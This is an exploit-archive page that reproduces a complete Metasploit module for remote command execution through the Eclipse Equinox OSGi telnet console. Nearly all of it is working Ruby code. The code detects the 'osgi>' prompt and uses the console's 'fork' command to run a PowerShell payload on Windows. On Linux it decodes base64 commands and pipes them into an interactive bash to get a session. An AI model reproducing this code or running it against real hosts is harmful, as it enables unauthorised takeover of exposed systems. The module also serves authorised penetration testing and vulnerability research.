Eclipse Equinoxe OSGi Console Command Execution



EKU-ID: 7424 CVE: OSVDB-ID:
Author: Quentin Kaiser Published: 2018-03-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  TELNET_IAC = Msf::Exploit::Remote::Telnet

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Eclipse Equinoxe OSGi Console Command Execution',
      'Description'    => %q{
        Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
        'fork' command to execute arbitrary commands on the remote system..
      },
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin@gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
       [
         ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
       ],
      'Platform' => %w{ linux win },
      'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
      'Targets'=> [
        [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
        [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
       ],
      'CmdStagerFlavor' => [ 'bourne' ],
      'DisclosureDate'  => 'Feb 13 2018',
      'DefaultTarget'   => 0))
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  def check
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
      res = sock.get_once
    end
    disconnect
    if res && res == "osgi> "
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    begin
      print_status("Accessing the OSGi console ...")

      unless check == Exploit::CheckCode::Vulnerable
        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
      end

      if target['Platform'] == "win" then
        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
      else
        execute_cmdstager({:flavor => :bourne})
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")

      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
        # Success! session is here!
        break if session_created?
      end
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  def exec_command(cmd)
      connect
      res = sock.get_once
      if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
        sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
          "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
        res = sock.get_once
      end
      print_status("Exploiting...")
      sock.put("#{cmd}\r\n")
      res = sock.get
      sock.put("disconnect\r\n")
      res = sock.get
      sock.put("y\r\n")
  end

  def execute_command(cmd, opts={})
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end
end